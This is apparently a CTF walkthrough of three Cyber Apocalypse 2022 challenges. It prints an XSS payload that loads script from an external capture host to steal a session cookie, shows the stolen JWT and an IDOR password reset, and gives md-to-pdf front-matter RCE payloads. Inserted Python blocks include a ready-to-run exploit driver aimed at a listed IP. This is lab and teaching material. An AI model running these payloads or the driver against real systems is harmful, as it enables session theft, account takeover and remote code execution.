InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties…


Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up


https://ctf.hackthebox.com/static/ca/cyber_apocalypse_2022_ca.jpg

Hello everyone, I am Hac, and today we are doing Cyber Apocalypse CTF 2022, specifically these challenges:

- Kryptos Support (Web)
- BlinkerFluids (web)
- Compressor (Misc)

We will start with Kryptos Support (Web). Let's go.

On visiting the page, we see an input field where we can submit some text that is then reviewed by the admin (it is a ticketing/reporting system: whatever we submit is opened by the admin user or some other privileged group of users).

I was wondering what I could do with this. I have played a good number of CTFs (still a noob), so I thought of trying XSS, but not the traditional alert(1): the payload fires in someone else's browser, not ours, so we need an out-of-band way to know whether it worked. That is why I am using XSS Hunter; there are other ways to do this, but I will stick with XSS Hunter. This is our payload:

"><script src=https://someone-in-somewhere-redacted.com></script>

And boom, our XSS payload fired. I was wondering what I could do from here. One thing was really interesting: we are able to grab a cookie, which could belong to the admin or to some other user with the same or slightly lower privilege.

Since we don't have any cookie of our own, that cookie was the interesting part. It is a JWT: base64url-decoding its middle segment shows the claims {"username":"moderator","uid":100,...}, so it is a moderator session rather than the admin's.

##### Cookies (Non-HTTPOnly)
`session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI1MzQ4ODV9.JO12yEA44QxXgfUmL3n6Sm4Et2AJc5rkvXkvSMdmFOI`

Now we can add that cookie to our browser.

[screenshot: adding the cookie in the browser]

After that we navigate to /tickets (thanks to my amazing team member KDirectorate).

I was wondering what I could do here; the page seemed to be static (except for a few things). I tried /rfid/somenumbers and the like, but no luck.

Then one of my team mates (KDirectorate) said to "check /setting, which has password reset functionality", which was really interesting. I navigated to /setting and intercepted the password-reset request in Burp Suite.

There were two fields: one was "password" and the other was "uid" (which identifies the user whose password is being changed).

Then I thought: what if I change the value of uid to 1? (Most of the time 1 = admin.)

And boom, I was able to change the admin's password: the endpoint trusted the uid from the request body instead of taking it from the authenticated session, a classic IDOR. After that I logged in as admin with the new password and was successful.
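To make the two steps above concrete (reading the stolen JWT, then the uid-in-body password reset), here is an added Python example. It is not the author's code or the challenge's code: the only real data is the captured session cookie; the user table, the HS256 signing secret and the shape of the two reset handlers are assumptions for illustration. The vulnerable handler authenticates the caller but still takes the target uid from the body; the fixed handler derives it from the verified session.

```python
import base64
import hashlib
import hmac
import json

# The moderator's session cookie captured through the XSS (from the write-up).
CAPTURED_SESSION = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI1MzQ4ODV9."
    "JO12yEA44QxXgfUmL3n6Sm4Et2AJc5rkvXkvSMdmFOI"
)


def b64url_decode(segment):
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_unverified(token):
    """Attacker's view: read header and claims without checking the signature."""
    header, payload, _sig = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(payload))


def sign_hs256(claims, secret):
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def verify_hs256(token, secret):
    """Server-side check: reject tokens whose HMAC does not match the secret."""
    header, body, sig = token.split(".")
    expected = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        raise ValueError("invalid JWT signature")
    return json.loads(b64url_decode(body))


# Constructed user table and signing secret (assumptions, not the challenge's).
DEMO_SECRET = b"demo-only-secret"
USERS = {
    1: {"username": "admin", "password": "original-admin-pw"},
    100: {"username": "moderator", "password": "original-mod-pw"},
}


def reset_password_vulnerable(session, body, secret=DEMO_SECRET):
    """Authenticates the caller, then trusts the uid in the body (IDOR)."""
    verify_hs256(session, secret)
    USERS[body["uid"]]["password"] = body["password"]
    return body["uid"]


def reset_password_fixed(session, body, secret=DEMO_SECRET):
    """The target account comes from the verified session, never from the body."""
    claims = verify_hs256(session, secret)
    if "uid" in body and body["uid"] != claims["uid"]:
        raise PermissionError("uid in body does not match the session")
    USERS[claims["uid"]]["password"] = body["password"]
    return claims["uid"]


if __name__ == "__main__":
    print("stolen session claims:", decode_unverified(CAPTURED_SESSION)[1])
    moderator = sign_hs256({"username": "moderator", "uid": 100}, DEMO_SECRET)
    changed = reset_password_vulnerable(moderator, {"uid": 1, "password": "pwned"})
    print("vulnerable handler changed password of uid", changed)
```

Note that decoding the captured token tells you whose session it is without needing the secret; forging a different uid would still require the secret, which is exactly why the IDOR on the reset endpoint matters: it turns a moderator session into an admin login without touching the JWT at all.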

BlinkerFluids (web)

In this challenge there is an RCE in md-to-pdf which we will use to get the flag (thanks KDirectorate). If we check the challenge files we come across:

'--no-sandbox', '--js-flags=--noexpose_wasm,--jitless'

Here --no-sandbox disables the sandbox of the headless Chromium that renders the PDF, so nothing isolates the renderer from the host environment. The code execution itself comes from md-to-pdf evaluating the JavaScript front matter of the Markdown (a `---js` block) server-side in Node, where require() is available.

Some resources I used to learn about this exploit:

So we intercept the request in Burp Suite and add the payload.

---js\n((require('child_process')).execSync('id > /tmp/RCE.txt'))\n---RCE

And we are able to execute our code:

POST /api/invoice/add HTTP/1.1
Host: 46.101.27.51:32374
Content-Length: 24
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://46.101.27.51:32374
Referer: http://46.101.27.51:32374/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

{"markdown_content":"---js\n((require('child_process')).execSync('ls > static/RCE.txt'))\n---RCE"}

Note the redirect target: writing to /tmp proves execution but gives us nothing to read, while writing into static/ puts the output somewhere the web server hands back over HTTP. From there we can get the flag with some simple enumeration.
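An added Python driver for that loop (not the author's or the challenge's code): it wraps a shell command in md-to-pdf's JavaScript front matter, posts it to the /api/invoice/add endpoint seen in the captured request, and then fetches the redirected output. The host is taken from the write-up's request; that files under static/ are served at /static/<name> is an assumption, so adjust the paths for the live instance.

```python
import json
import urllib.request

# Host from the captured request in the write-up; change for your instance.
BASE_URL = "http://46.101.27.51:32374"
# Assumption: the app serves its static/ directory at /static/, so output
# redirected there can be read back with a plain GET.
OUTPUT_FILE = "RCE.txt"


def build_payload(command):
    """Embed a shell command in a `---js` front-matter block.

    md-to-pdf evaluates JavaScript front matter server-side, so
    require('child_process') is reachable from it. The command's output is
    redirected under static/ (not /tmp) so we can retrieve it over HTTP.
    """
    # json.dumps yields a double-quoted JS string literal with any quotes escaped.
    js_command = json.dumps(f"{command} > static/{OUTPUT_FILE}")
    markdown = f"---js\n((require('child_process')).execSync({js_command}))\n---RCE"
    return {"markdown_content": markdown}


def trigger(command, base_url=BASE_URL):
    """POST the payload; returns the HTTP status of the invoice endpoint."""
    data = json.dumps(build_payload(command)).encode()
    req = urllib.request.Request(
        f"{base_url}/api/invoice/add",
        data=data,
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def fetch_output(base_url=BASE_URL):
    """Read back whatever the command wrote into static/."""
    with urllib.request.urlopen(f"{base_url}/static/{OUTPUT_FILE}", timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Enumerate first; once you know where the flag lives, cat it the same way.
    print("status:", trigger("id; ls -la"))
    print(fetch_output())
```

Because the command travels inside a JS string inside a JSON string, quoting is the usual stumbling block; building both layers with json.dumps keeps commands containing quotes or backslashes intact.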

Compressor (Misc)

In this challenge we take advantage of a command injection to get the flag.

This one is easy, so I will go quickly: we are able to execute arbitrary commands, and with some simple enumeration we can find the flag.



Written by hac#

eJPT | HTB CBBH | CompTIA Pentest+
